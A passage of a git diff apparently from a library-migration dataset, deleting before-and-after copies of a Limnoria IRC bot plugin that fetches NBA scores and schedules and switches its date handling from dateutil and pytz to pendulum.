pendulum.now('US/Pacific') - - @staticmethod - def _ISODateToEasternDate(iso): -@@ -681,8 +684,8 @@ class NBA(callbacks.Plugin): - Eastern-time date. - (The default human-readable format for the listing of games). - """ -- date = dateutil.parser.parse(iso) -- date_eastern = date.astimezone(pytz.timezone('US/Eastern')) -+ date = pendulum.parse(iso) -+ date_eastern = date.in_tz('US/Eastern') - eastern_date = date_eastern.strftime('%a %m/%d') - return "{}".format(eastern_date) - -@@ -692,8 +695,8 @@ class NBA(callbacks.Plugin): - Eastern time formatted with am/pm. - (The default human-readable format for the listing of games). - """ -- date = dateutil.parser.parse(iso) -- date_eastern = date.astimezone(pytz.timezone('US/Eastern')) -+ date = pendulum.parse(iso) -+ date_eastern = date.in_tz('US/Eastern') - eastern_time = date_eastern.strftime('%-I:%M %p') - return "{} ET".format(eastern_time) - -@@ -702,8 +705,8 @@ class NBA(callbacks.Plugin): - """Convert the ISO date in UTC time that the API outputs into a - string with a date and Eastern time formatted with am/pm. - """ -- date = dateutil.parser.parse(iso) -- date_eastern = date.astimezone(pytz.timezone('US/Eastern')) -+ date = pendulum.parse(iso) -+ date_eastern = date.in_tz('US/Eastern') - eastern_datetime = date_eastern.strftime('%a %m/%d, %I:%M %p') - return "{} ET".format(eastern_datetime) - -@@ -723,8 +726,7 @@ class NBA(callbacks.Plugin): - elif date == 'tomorrow': - day_delta = 1 - # Calculate the day difference and return a string -- date_string = (cls._pacificTimeNow() + -- datetime.timedelta(days=day_delta)).strftime('%Y%m%d') -+ date_string = cls._pacificTimeNow().add(days=day_delta).strftime('%Y%m%d') - return date_string - - @classmethod -@@ -767,12 +769,12 @@ class NBA(callbacks.Plugin): - - elif date.replace('-', '').isdigit(): - try: -- parsed_date = datetime.datetime.strptime(date, '%Y-%m-%d') -+ parsed_date = pendulum.from_format(date, 'YYYY-MM-DD') - except: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - - # The current API goes back until 2014-10-04. Is it in range? -- if parsed_date.date() < datetime.date(2014, 10, 4): -+ if parsed_date < pendulum.datetime(2014, 10, 4): - raise ValueError('I can only go back until 2014-10-04') - else: - raise ValueError('Date is not valid') diff --git a/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NBA$plugin.py.source.py b/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NBA$plugin.py.source.py deleted file mode 100644 index fc86def..0000000 --- a/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NBA$plugin.py.source.py +++ /dev/null @@ -1,829 +0,0 @@ -### -# Copyright (c) 2018, Santiago Gil -# Copyright (c) 2020, oddluck -# All rights reserved. -# -# Redistribution and use in source and binary forms, with or without -# modification, are permitted provided that the following conditions are met: -# -# * Redistributions of source code must retain the above copyright notice, -# this list of conditions, and the following disclaimer. -# * Redistributions in binary form must reproduce the above copyright notice, -# this list of conditions, and the following disclaimer in the -# documentation and/or other materials provided with the distribution. -# * Neither the name of the author of this software nor the name of -# contributors to this software may be used to endorse or promote products -# derived from this software without specific prior written consent. -# -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" -# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE -# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE -# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE -# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF -# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS -# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN -# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) -# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -# POSSIBILITY OF SUCH DAMAGE. -### - -#import supybot.utils as utils -#from supybot.commands import * -from supybot.commands import optional, wrap - -#import supybot.plugins as plugins -import supybot.ircutils as ircutils -import supybot.callbacks as callbacks -try: - from supybot.i18n import PluginInternationalization - _ = PluginInternationalization('NBA') -except ImportError: - # Placeholder that allows to run the plugin on a bot - # without the i18n module - _ = lambda x: x - -import datetime -import dateutil.parser -import httplib2 -import json -import pytz -from xml.etree import ElementTree - -class NBA(callbacks.Plugin): - """Get scores from NBA.com.""" - - _ENDPOINT_BASE_URL = 'https://data.nba.net' - - _SCOREBOARD_ENDPOINT = (_ENDPOINT_BASE_URL - + '/10s/prod/v2/{}/' - + 'scoreboard.json') - - _TODAY_ENDPOINT = (_ENDPOINT_BASE_URL - + '/prod/v3/today.json') - - _FUZZY_DAYS = frozenset(('yesterday', 'tonight', - 'today', 'tomorrow')) - - _TEAM_TRICODES = frozenset(('CHA', 'ATL', 'IND', 'MEM', 'DET', - 'UTA', 'CHI', 'TOR', 'CLE', 'OKC', - 'DAL', 'MIN', 'BOS', 'SAS', 'MIA', - 'DEN', 'LAL', 'PHX', 'NOP', 'MIL', - 'HOU', 'NYK', 'ORL', 'SAC', 'PHI', - 'BKN', 'POR', 'GSW', 'LAC', 'WAS')) - - def __init__(self, irc): - self.__parent = super(NBA, self) - self.__parent.__init__(irc) - - self._http = httplib2.Http('.cache') - - def nba(self, irc, msg, args, optional_team, optional_date): - """[] [] - - Get games for a given date. If none is specified, return - games scheduled for today. Optionally add team abbreviation - to filter for a specific team. - """ - - # Check to see if there's optional input and if there is check - # if it's a date or a team, or both. - try: - team, date = self._parseOptionalArguments(optional_team, - optional_date) - except ValueError as error: - irc.error(str(error)) - return - - try: - games = self._getTodayGames() if date is None \ - else self._getGamesForDate(date) - except ConnectionError as error: - irc.error('Could not connect to nba.com') - return - except: - irc.error('Something went wrong') - return - - games = self._filterGamesWithTeam(team, games) - - games_string = self._resultAsString(games) - - # Single game query? We can show some extra info. - if len(games) == 1: - game = games[0] - - # If the game has ended, we fetch the recap info from NBA.com: - if game['ended']: - try: - recap = self._getRecapInfo(game) - games_string += ' | {} {}'.format(ircutils.bold('Recap:'), - recap) - except: - pass - - else: - # Otherwise, when querying a specific game in progress, - # we show the broadcaster list. - # Also, if it has a text nugget, and it's not - # 'Watch live', we show it: - broadcasters = game['tv_broadcasters'] - broadcasters_string = self._broadcastersToString(broadcasters) - games_string += ' [{}]'.format(broadcasters_string) - - nugget = game['text_nugget'] - nugget_is_interesting = nugget and 'Watch live' not in nugget - if nugget_is_interesting: - games_string += ' | {}'.format(nugget) - - irc.reply(games_string) - - nba = wrap(nba, [optional('somethingWithoutSpaces'), - optional('somethingWithoutSpaces')]) - - def nbatv(self, irc, msg, args, team): - """[] - - Given a team, if there is a game scheduled for today, - return where it is being broadcasted. - """ - try: - team = self._parseTeamInput(team) - except ValueError as error: - irc.error(str(error)) - return - - games = self._filterGamesWithTeam(team, self._getTodayGames()) - - if not games: - irc.reply('{} is not playing today.'.format(team)) - return - - game = games[0] - game_string = self._gameToString(game) - broadcasters_string = self._broadcastersToString(game['tv_broadcasters']) - irc.reply('{} on: {}'.format(game_string, broadcasters_string)) - - nbatv = wrap(nbatv, ['somethingWithoutSpaces']) - - def nbanext(self, irc, msg, args, n, team, team2): - """[] [] - - Get the next games (1 by default; max. 10) for a given team - or, if two teams are provided, matchups between them. - - """ - MAX_GAMES_IN_RESULT = 10 - - try: - if team == team2: - irc.error('Both teams should be different.') - return - - team = self._parseTeamInput(team) - if team2 is not None: - team2 = self._parseTeamInput(team2) - - team_schedule = self._getTeamSchedule(team) - except ValueError as error: - irc.error(str(error)) - return - - last_played = team_schedule['lastStandardGamePlayedIndex'] - - # Keeping only the games that haven't been played: - future_games = team_schedule['standard'][last_played+1:] - - if n is None: - n = 1 - end = min(MAX_GAMES_IN_RESULT, n, len(future_games)-1) - - if team2 is None: - games = future_games - else: - # Filtering matchups between team and team2: - team2_id = self._tricodeToTeamId(team2) - games = [g for g in future_games \ - if team2_id in [g['vTeam']['teamId'], - g['hTeam']['teamId']]] - - if not games: - irc.error('I could not find future games.') - return - - for game in games[:end]: - irc.reply(self._upcomingGameToString(game)) - - - nbanext = wrap(nbanext, [optional('positiveInt'), - 'somethingWithoutSpaces', - optional('somethingWithoutSpaces')]) - - def nbalast(self, irc, msg, args, n, team, team2): - """[] [] - - Get the last games (1 by default; max. 10) for a given team - or, if two teams are provided, matchups between them. - - """ - MAX_GAMES_IN_RESULT = 10 - - try: - if team == team2: - irc.error('Both teams should be different.') - return - - team = self._parseTeamInput(team) - if team2 is not None: - team2 = self._parseTeamInput(team2) - - team_schedule = self._getTeamSchedule(team) - except ValueError as error: - irc.error(str(error)) - return - - last_played = team_schedule['lastStandardGamePlayedIndex'] - - # Keeping only the games that have been played: - team_past_games = team_schedule['standard'][:last_played+1] - - # Making sure the number of games we will show is a valid one: - if n is None: - n = 1 - n = min(MAX_GAMES_IN_RESULT, n) - - if team2 is None: - games = team_past_games - else: - # Filtering matchups between team and team2: - team2_id = self._tricodeToTeamId(team2) - games = [g for g in team_past_games \ - if team2_id in [g['vTeam']['teamId'], - g['hTeam']['teamId']]] - - if not games: - irc.error('I could not find past games.') - return - - for game in reversed(games[-n:]): # Most-recent game first. - irc.reply(self._pastGameToString(game)) - - - nbalast = wrap(nbalast, [optional('positiveInt'), - 'somethingWithoutSpaces', - optional('somethingWithoutSpaces')]) - - @classmethod - def _parseOptionalArguments(cls, optional_team, optional_date): - """Parse the optional arguments, which could be None, and return - a (team, date) tuple. In case of finding an invalid argument, it - throws a ValueError exception. - """ - # No arguments: - if optional_team is None: - return (None, None) - - # Both arguments: - if (optional_date is not None) and (optional_team is not None): - team = cls._parseTeamInput(optional_team) - date = cls._parseDateInput(optional_date) - return (team, date) - - # Only one argument: - if cls._isPotentialDate(optional_team): - # Should be a date. - team = None - date = cls._parseDateInput(optional_team) - else: - # Should be a team. - team = cls._parseTeamInput(optional_team) - date = None - - return (team, date) - - def _getTodayGames(self): - return self._getGames(self._getTodayDate()) - - def _getGamesForDate(self, date): - return self._getGames(date) - - @staticmethod - def _filterGamesWithTeam(team, games): - """Given a list of games, return those that involve a given - team. If team is None, return the list with no modifications. - """ - if team is None: - return games - - return [g for g in games if team == g['home_team'] - or team == g['away_team']] - -############################ -# Content-getting helpers -############################ - def _getTodayJSON(self): - today_url = self._ENDPOINT_BASE_URL + '/10s/prod/v3/today.json' - return self._getJSON(today_url) - - def _getGames(self, date): - """Given a date, populate the url with it and try to download - its content. If successful, parse the JSON data and extract the - relevant fields for each game. Returns a list of games. - """ - url = self._getEndpointURL(date) - - # If asking for today's results, revalidate the cached data. - # ('If-Mod.-Since' flag.). This allows to get real-time scores. - revalidate_cache = (date == self._getTodayDate()) - response = self._getURL(url, revalidate_cache) - - json_data = self._extractJSON(response) - - return self._parseGames(json_data) - - @classmethod - def _getEndpointURL(cls, date): - return cls._SCOREBOARD_ENDPOINT.format(date) - - def _getTeamSchedule(self, tricode): - """Fetch the json with the given team's schedule""" - - # First we fetch `today.json` to extract the path to teams' - # schedules and `seasonScheduleYear`: - today_json = self._getTodayJSON() - schedule_path = today_json['links']['teamScheduleYear2'] - season_year = today_json['seasonScheduleYear'] - - # We also need to convert the `tricode` to a `team_id`: - team_id = self._tricodeToTeamId(tricode) - - # (The path looks like this: - # '/prod/v1/{{seasonScheduleYear}}/teams/{{teamId}}/schedule.json') - - # Now we can fill-in the url: - schedule_path = schedule_path.replace('{{teamId}}', team_id) - schedule_path = schedule_path.replace('{{seasonScheduleYear}}', - str(season_year)) - - return self._getJSON(self._ENDPOINT_BASE_URL + schedule_path)['league'] - - def _tricodeToTeamId(self, tricode): - """Given a valid team tricode, get the `teamId` used in NBA.com""" - - teams_path = self._getJSON(self._TODAY_ENDPOINT)['links']['teams'] - teams_json = self._getJSON(self._ENDPOINT_BASE_URL + teams_path) - - for team in teams_json['league']['standard']: - if team['tricode'] == tricode: - return team['teamId'] - - raise ValueError('{} is not a valid tricode'.format(tricode)) - - def _teamIdToTricode(self, team_id): - """Given a valid teamId, get the team's tricode""" - - teams_path = self._getJSON(self._TODAY_ENDPOINT)['links']['teams'] - teams_json = self._getJSON(self._ENDPOINT_BASE_URL + teams_path) - - for team in teams_json['league']['standard']: - if team['teamId'] == team_id: - return team['tricode'] - - raise ValueError('{} is not a valid teamId'.format(team_id)) - - def _getURL(self, url, force_revalidation=False): - """Use httplib2 to download the URL's content. - - The `force_revalidation` parameter forces the data to be - validated before being returned from the cache. - In the worst case the data has not changed in the server, - and we get a '304 - Not Modified' response. - """ - user_agent = 'Mozilla/5.0 \ - (X11; Ubuntu; Linux x86_64; rv:45.0) \ - Gecko/20100101 Firefox/45.0' - header = {'User-Agent': user_agent} - - if force_revalidation: - header['Cache-Control'] = 'max-age=0' - - response, content = self._http.request(url, 'GET', headers=header) - - if response.fromcache: - self.log.debug('%s - 304/Cache Hit', url) - - if response.status == 200: - return content - - self.log.error('HTTP Error (%s): %s', url, error.code) - raise ConnectionError('Could not access URL') - - @staticmethod - def _extractJSON(body): - return json.loads(body) - - def _getJSON(self, url): - """Fetch `url` and return its contents decoded as json.""" - return self._extractJSON(self._getURL(url)) - - @classmethod - def _parseGames(cls, json_data): - """Extract all relevant fields from NBA.com's scoreboard.json - and return a list of games. - """ - games = [] - for g in json_data['games']: - # Starting times are in UTC. By default, we will show - # Eastern times. - # (In the future we could add a user option to select - # timezones.) - try: - starting_time = cls._ISODateToEasternTime(g['startTimeUTC']) - except: - starting_time = 'TBD' if g['isStartTimeTBD'] else '' - - game_info = {'game_id': g['gameId'], - 'home_team': g['hTeam']['triCode'], - 'away_team': g['vTeam']['triCode'], - 'home_score': g['hTeam']['score'], - 'away_score': g['vTeam']['score'], - 'starting_year': g['startDateEastern'][0:4], - 'starting_month': g['startDateEastern'][4:6], - 'starting_day': g['startDateEastern'][6:8], - 'starting_time': starting_time, - 'starting_time_TBD': g['isStartTimeTBD'], - 'clock': g['clock'], - 'period': g['period'], - 'buzzer_beater': g['isBuzzerBeater'], - 'ended': (g['statusNum'] == 3), - 'text_nugget': g['nugget']['text'].strip(), - 'tv_broadcasters': cls._extractGameBroadcasters(g) - } - - games.append(game_info) - - return games - - @staticmethod - def _extractGameBroadcasters(game_json): - """Extract the list of broadcasters from the API. - Return a dictionary of broadcasts: - (['vTeam', 'hTeam', 'national', 'canadian']) to - the short name of the broadcaster. - """ - json_data = game_json['watch']['broadcast']['broadcasters'] - game_broadcasters = dict() - - for category in json_data: - broadcasters_list = json_data[category] - if broadcasters_list and 'shortName' in broadcasters_list[0]: - game_broadcasters[category] = broadcasters_list[0]['shortName'] - return game_broadcasters - -############################ -# Formatting helpers -############################ - @classmethod - def _resultAsString(cls, games): - if not games: - return "No games found" - - # sort games list and put F(inal) games at end - sorted_games = sorted(games, key=lambda k: k['ended']) - return ' | '.join([cls._gameToString(g) for g in sorted_games]) - - @classmethod - def _gameToString(cls, game): - """ Given a game, format the information into a string - according to the context. - - For example: - * "MEM @ CLE 07:00 PM ET" (a game that has not started yet), - * "HOU 132 GSW 127 F OT2" (a game that ended and went to 2 - overtimes), - * "POR 36 LAC 42 8:01 Q2" (a game in progress). - """ - away_team = game['away_team'] - home_team = game['home_team'] - - if game['period']['current'] == 0: # The game hasn't started yet - starting_time = game['starting_time'] \ - if not game['starting_time_TBD'] \ - else "TBD" - return "{} @ {} {}".format(away_team, home_team, starting_time) - - # The game started => It has points: - away_score = game['away_score'] - home_score = game['home_score'] - - away_string = "{} {}".format(away_team, away_score) - home_string = "{} {}".format(home_team, home_score) - - # Bold for the winning team: - if int(away_score) > int(home_score): - away_string = ircutils.bold(away_string) - elif int(home_score) > int(away_score): - home_string = ircutils.bold(home_string) - - game_string = "{} {} {}".format(away_string, home_string, - cls._clockBoardToString(game['clock'], - game['period'], - game['ended'])) - # Highlighting 'buzzer-beaters': - if game['buzzer_beater'] and not game['ended']: - game_string = ircutils.mircColor(game_string, fg='yellow', - bg='black') - - return game_string - - @classmethod - def _clockBoardToString(cls, clock, period, game_ended): - """Get a string with current period and, if the game is still - in progress, the remaining time in it. - """ - period_number = period['current'] - # Game hasn't started => There is no clock yet. - if period_number == 0: - return '' - - # Halftime - if period['isHalftime']: - return ircutils.mircColor('Halftime', 'orange') - - period_string = cls._periodToString(period_number) - - # Game finished: - if game_ended: - if period_number == 4: - return ircutils.mircColor('F', 'red') - - return ircutils.mircColor("F {}".format(period_string), 'red') - - # Game in progress: - if period['isEndOfPeriod']: - return ircutils.mircColor("E{}".format(period_string), 'blue') - - # Period in progress, show clock: - return "{} {}".format(clock, ircutils.mircColor(period_string, - 'green')) - - @staticmethod - def _periodToString(period): - """Get a string describing the current period in the game. - - Period is an integer counting periods from 1 (so 5 would be - OT1). - The output format is as follows: {Q1...Q4} (regulation); - {OT, OT2, OT3...} (overtimes). - """ - if period <= 4: - return "Q{}".format(period) - - ot_number = period - 4 - if ot_number == 1: - return "OT" - return "OT{}".format(ot_number) - - @staticmethod - def _broadcastersToString(broadcasters): - """Given a broadcasters dictionary (category->name), where - category is in ['vTeam', 'hTeam', 'national', 'canadian'], - return a printable string representation of that list. - """ - items = [] - for category in ['vTeam', 'hTeam', 'national', 'canadian']: - if category in broadcasters: - items.append(broadcasters[category]) - return ', '.join(items) - - def _upcomingGameToString(self, game): - """Given a team's upcoming game, return a string with - the opponent's tricode and the date of the game. - """ - - date = self._ISODateToEasternDatetime(game['startTimeUTC']) - - home_tricode = self._teamIdToTricode(game['hTeam']['teamId']) - away_tricode = self._teamIdToTricode(game['vTeam']['teamId']) - - if game['isHomeTeam']: - home_tricode = ircutils.bold(home_tricode) - else: - away_tricode = ircutils.bold(away_tricode) - - return '{} | {} @ {}'.format(date, away_tricode, home_tricode) - - def _pastGameToString(self, game): - """Given a team's upcoming game, return a string with - the opponent's tricode and the result. - """ - date = self._ISODateToEasternDate(game['startTimeUTC']) - - home_tricode = self._teamIdToTricode(game['hTeam']['teamId']) - away_tricode = self._teamIdToTricode(game['vTeam']['teamId']) - - home_score = int(game['hTeam']['score']) - away_score = int(game['vTeam']['score']) - - if game['isHomeTeam']: - was_victory = (home_score > away_score) - else: - was_victory = (away_score > home_score) - - if home_score > away_score: - home_tricode = ircutils.bold(home_tricode) - home_score = ircutils.bold(home_score) - else: - away_tricode = ircutils.bold(away_tricode) - away_score = ircutils.bold(away_score) - - result = ircutils.mircColor('W', 'green') if was_victory \ - else ircutils.mircColor('L', 'red') - - points = '{} {} {} {}'.format(away_tricode, away_score, - home_tricode, home_score) - - if game['seasonStageId'] == 1: - points += ' (Preseason)' - - return '{} {} | {}'.format(date, result, points) - -############################ -# Date-manipulation helpers -############################ - @classmethod - def _getTodayDate(cls): - """Get the current date formatted as "YYYYMMDD". - Because the API separates games by day of start, we will - consider and return the date in the Pacific timezone. - The objective is to avoid reading future games anticipatedly - when the day rolls over at midnight, which would cause us to - ignore games in progress that may have started on the previous - day. - Taking the west coast time guarantees that the day will advance - only when the whole continental US is already on that day. - """ - today = cls._pacificTimeNow().date() - today_iso = today.isoformat() - return today_iso.replace('-', '') - - @staticmethod - def _easternTimeNow(): - return datetime.datetime.now(pytz.timezone('US/Eastern')) - - @staticmethod - def _pacificTimeNow(): - return datetime.datetime.now(pytz.timezone('US/Pacific')) - - @staticmethod - def _ISODateToEasternDate(iso): - """Convert the ISO date in UTC time that the API outputs into an - Eastern-time date. - (The default human-readable format for the listing of games). - """ - date = dateutil.parser.parse(iso) - date_eastern = date.astimezone(pytz.timezone('US/Eastern')) - eastern_date = date_eastern.strftime('%a %m/%d') - return "{}".format(eastern_date) - - @staticmethod - def _ISODateToEasternTime(iso): - """Convert the ISO date in UTC time that the API outputs into an - Eastern time formatted with am/pm. - (The default human-readable format for the listing of games). - """ - date = dateutil.parser.parse(iso) - date_eastern = date.astimezone(pytz.timezone('US/Eastern')) - eastern_time = date_eastern.strftime('%-I:%M %p') - return "{} ET".format(eastern_time) - - @staticmethod - def _ISODateToEasternDatetime(iso): - """Convert the ISO date in UTC time that the API outputs into a - string with a date and Eastern time formatted with am/pm. - """ - date = dateutil.parser.parse(iso) - date_eastern = date.astimezone(pytz.timezone('US/Eastern')) - eastern_datetime = date_eastern.strftime('%a %m/%d, %I:%M %p') - return "{} ET".format(eastern_datetime) - - @staticmethod - def _stripDateSeparators(date_string): - return date_string.replace('-', '') - - @classmethod - def _EnglishDateToDate(cls, date): - """Convert a human-readable like 'yesterday' to a datetime - object and return a 'YYYYMMDD' string. - """ - if date == 'yesterday': - day_delta = -1 - elif date == 'today' or date == 'tonight': - day_delta = 0 - elif date == 'tomorrow': - day_delta = 1 - # Calculate the day difference and return a string - date_string = (cls._pacificTimeNow() + - datetime.timedelta(days=day_delta)).strftime('%Y%m%d') - return date_string - - @classmethod - def _isValidTricode(cls, team): - return team in cls._TEAM_TRICODES - -############################ -# Input-parsing helpers -############################ - @classmethod - def _isPotentialDate(cls, string): - """Given a user-provided string, check whether it could be a - date. - """ - return (string.lower() in cls._FUZZY_DAYS or - string.replace('-', '').isdigit()) - - @classmethod - def _parseTeamInput(cls, team): - """Given a user-provided string, try to extract an upper-case - team tricode from it. If not valid, throws a ValueError - exception. - """ - t = team.upper() - if not cls._isValidTricode(t): - raise ValueError('{} is not a valid team'.format(team)) - return t - - @classmethod - def _parseDateInput(cls, date): - """Verify that the given string is a valid date formatted as - YYYY-MM-DD. Also, the API seems to go back until 2014-10-04, - so we will check that the input is not a date earlier than that. - In case of failure, throws a ValueError exception. - """ - date = date.lower() - - if date in cls._FUZZY_DAYS: - date = cls._EnglishDateToDate(date) - - elif date.replace('-', '').isdigit(): - try: - parsed_date = datetime.datetime.strptime(date, '%Y-%m-%d') - except: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - - # The current API goes back until 2014-10-04. Is it in range? - if parsed_date.date() < datetime.date(2014, 10, 4): - raise ValueError('I can only go back until 2014-10-04') - else: - raise ValueError('Date is not valid') - - return cls._stripDateSeparators(date) - - - def _getRecapInfo(self, game): - """Given a finished game, fetch its recap summary and a link - to its video recap. It returns a string with the format - '{summary} (link to video)'. - - The link is shortened by calling _shortenURL(str) -> str. - """ - - recap_base_url = 'https://www.nba.com/video/'\ - '{year}/{month}/{day}/'\ - '{game_id}-{away_team}-{home_team}-recap.xml' - - url = recap_base_url.format(year=game['starting_year'], - month=game['starting_month'], - day=game['starting_day'], - game_id=game['game_id'], - away_team=game['away_team'].lower(), - home_team=game['home_team'].lower()) - - xml = self._getURL(url) - tree = ElementTree.fromstring(xml) - - res = [] - - summary = tree.find('description') - if summary is not None: - res.append(summary.text) - - video_recap = tree.find("*file[@bitrate='1920x1080_5904']") - if video_recap is not None: - url = self._shortenURL(video_recap.text) - res.append('({})'.format(url)) - - return ' '.join(res) - - @staticmethod - def _shortenURL(url): - """ Run a link through an URL shortener and return the new url.""" - - # Complete with the code that uses your desired - # shortener service. - return url - - -Class = NBA - -# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79: diff --git a/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NBA$plugin.py.target.py b/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NBA$plugin.py.target.py deleted file mode 100644 index c0d28e8..0000000 --- a/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NBA$plugin.py.target.py +++ /dev/null @@ -1,831 +0,0 @@ -### -# Copyright (c) 2018, Santiago Gil -# Copyright (c) 2020, oddluck -# All rights reserved. -# -# Redistribution and use in source and binary forms, with or without -# modification, are permitted provided that the following conditions are met: -# -# * Redistributions of source code must retain the above copyright notice, -# this list of conditions, and the following disclaimer. -# * Redistributions in binary form must reproduce the above copyright notice, -# this list of conditions, and the following disclaimer in the -# documentation and/or other materials provided with the distribution. -# * Neither the name of the author of this software nor the name of -# contributors to this software may be used to endorse or promote products -# derived from this software without specific prior written consent. -# -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" -# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE -# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE -# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE -# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF -# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS -# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN -# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) -# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -# POSSIBILITY OF SUCH DAMAGE. -### - -#import supybot.utils as utils -#from supybot.commands import * -from supybot.commands import optional, wrap - -#import supybot.plugins as plugins -import supybot.ircutils as ircutils -import supybot.callbacks as callbacks -import httplib2 -import json -import pendulum -from xml.etree import ElementTree - -try: - from supybot.i18n import PluginInternationalization - _ = PluginInternationalization('NBA') -except ImportError: - # Placeholder that allows to run the plugin on a bot - # without the i18n module - _ = lambda x: x - -class NBA(callbacks.Plugin): - """Get scores from NBA.com.""" - - _ENDPOINT_BASE_URL = 'https://data.nba.net' - - _SCOREBOARD_ENDPOINT = (_ENDPOINT_BASE_URL - + '/10s/prod/v2/{}/' - + 'scoreboard.json') - - _TODAY_ENDPOINT = (_ENDPOINT_BASE_URL - + '/prod/v3/today.json') - - _FUZZY_DAYS = frozenset(('yesterday', 'tonight', - 'today', 'tomorrow')) - - _TEAM_TRICODES = frozenset(('CHA', 'ATL', 'IND', 'MEM', 'DET', - 'UTA', 'CHI', 'TOR', 'CLE', 'OKC', - 'DAL', 'MIN', 'BOS', 'SAS', 'MIA', - 'DEN', 'LAL', 'PHX', 'NOP', 'MIL', - 'HOU', 'NYK', 'ORL', 'SAC', 'PHI', - 'BKN', 'POR', 'GSW', 'LAC', 'WAS')) - - def __init__(self, irc): - self.__parent = super(NBA, self) - self.__parent.__init__(irc) - - self._http = httplib2.Http('.cache') - - def nba(self, irc, msg, args, optional_team, optional_date): - """[] [] - - Get games for a given date. If none is specified, return - games scheduled for today. Optionally add team abbreviation - to filter for a specific team. - """ - - # Check to see if there's optional input and if there is check - # if it's a date or a team, or both. - try: - team, date = self._parseOptionalArguments(optional_team, - optional_date) - except ValueError as error: - irc.error(str(error)) - return - - try: - games = self._getTodayGames() if date is None \ - else self._getGamesForDate(date) - except ConnectionError as error: - irc.error('Could not connect to nba.com') - return - except: - irc.error('Something went wrong') - return - - games = self._filterGamesWithTeam(team, games) - - games_string = self._resultAsString(games) - - # Single game query? We can show some extra info. - if len(games) == 1: - game = games[0] - - # If the game has ended, we fetch the recap info from NBA.com: - if game['ended']: - try: - recap = self._getRecapInfo(game) - games_string += ' | {} {}'.format(ircutils.bold('Recap:'), - recap) - except: - pass - - else: - # Otherwise, when querying a specific game in progress, - # we show the broadcaster list. - # Also, if it has a text nugget, and it's not - # 'Watch live', we show it: - broadcasters = game['tv_broadcasters'] - broadcasters_string = self._broadcastersToString(broadcasters) - games_string += ' [{}]'.format(broadcasters_string) - - nugget = game['text_nugget'] - nugget_is_interesting = nugget and 'Watch live' not in nugget - if nugget_is_interesting: - games_string += ' | {}'.format(nugget) - - if date: - date = pendulum.from_format(date, 'YYYYMMDD').to_date_string() - else: - date = pendulum.now().to_date_string() - - irc.reply("{0}: {1}".format(date, games_string)) - - nba = wrap(nba, [optional('somethingWithoutSpaces'), - optional('somethingWithoutSpaces')]) - - def nbatv(self, irc, msg, args, team): - """[] - - Given a team, if there is a game scheduled for today, - return where it is being broadcasted. - """ - try: - team = self._parseTeamInput(team) - except ValueError as error: - irc.error(str(error)) - return - - games = self._filterGamesWithTeam(team, self._getTodayGames()) - - if not games: - irc.reply('{} is not playing today.'.format(team)) - return - - game = games[0] - game_string = self._gameToString(game) - broadcasters_string = self._broadcastersToString(game['tv_broadcasters']) - irc.reply('{} on: {}'.format(game_string, broadcasters_string)) - - nbatv = wrap(nbatv, ['somethingWithoutSpaces']) - - def nbanext(self, irc, msg, args, n, team, team2): - """[] [] - - Get the next games (1 by default; max. 10) for a given team - or, if two teams are provided, matchups between them. - - """ - MAX_GAMES_IN_RESULT = 10 - - try: - if team == team2: - irc.error('Both teams should be different.') - return - - team = self._parseTeamInput(team) - if team2 is not None: - team2 = self._parseTeamInput(team2) - - team_schedule = self._getTeamSchedule(team) - except ValueError as error: - irc.error(str(error)) - return - - last_played = team_schedule['lastStandardGamePlayedIndex'] - - # Keeping only the games that haven't been played: - future_games = team_schedule['standard'][last_played+1:] - - if n is None: - n = 1 - end = min(MAX_GAMES_IN_RESULT, n, len(future_games)-1) - - if team2 is None: - games = future_games - else: - # Filtering matchups between team and team2: - team2_id = self._tricodeToTeamId(team2) - games = [g for g in future_games \ - if team2_id in [g['vTeam']['teamId'], - g['hTeam']['teamId']]] - - if not games: - irc.error('I could not find future games.') - return - - for game in games[:end]: - irc.reply(self._upcomingGameToString(game)) - - - nbanext = wrap(nbanext, [optional('positiveInt'), - 'somethingWithoutSpaces', - optional('somethingWithoutSpaces')]) - - def nbalast(self, irc, msg, args, n, team, team2): - """[] [] - - Get the last games (1 by default; max. 10) for a given team - or, if two teams are provided, matchups between them. - - """ - MAX_GAMES_IN_RESULT = 10 - - try: - if team == team2: - irc.error('Both teams 